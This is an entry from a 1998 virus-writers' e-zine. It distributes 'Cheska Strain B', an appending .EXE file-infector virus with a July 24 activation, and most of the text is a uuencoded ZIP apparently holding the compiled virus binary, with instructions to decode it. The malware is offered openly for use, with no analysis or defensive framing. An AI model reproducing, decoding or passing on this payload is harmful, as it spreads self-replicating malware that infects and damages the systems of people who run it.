ฤฤฤฤฤฤฤ[PVW4.017]ฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤ
Written for the : Pinoy Virus Writers E-Zine #4
DATE : Late September 1998
                                % % % % %

                               - = %|% = -

 ษอออ   sOuRcEs !!!  ออออออออออออออออออออออออออออออออออออออออออป
 ศอออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออผ

 NAME : Cheska Strain B
 AUTHOR : Zoom23
 NOTES : - Appending Run time .EXE infector Virus.
         - Activation of string July 24.
         - 2 infections per run.
         - Compiled with TP 7.0  , 4624 bytes long.

 Use UUdecode to covert to Binary form.

    ฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤ [  CUT HERE  ] ฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤ
begin 644 cheska2.zip
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
H`````````$-(15-+03(N15A%4$L%!@`````!``$`.0```,T+````````
`
end
    ฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤ [  CUT HERE  ] ฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤ

 (C) Zoom23
 brianjan@mailcity.com
 Pinoy Virus Writers 1998
 Http://www.zoom23.home.ml.org
 http://sourceofkoas.com/homes/brianjan
 http://members.xoom.com/Zoom23

 EOF-------------------------------------------------------------------EOF
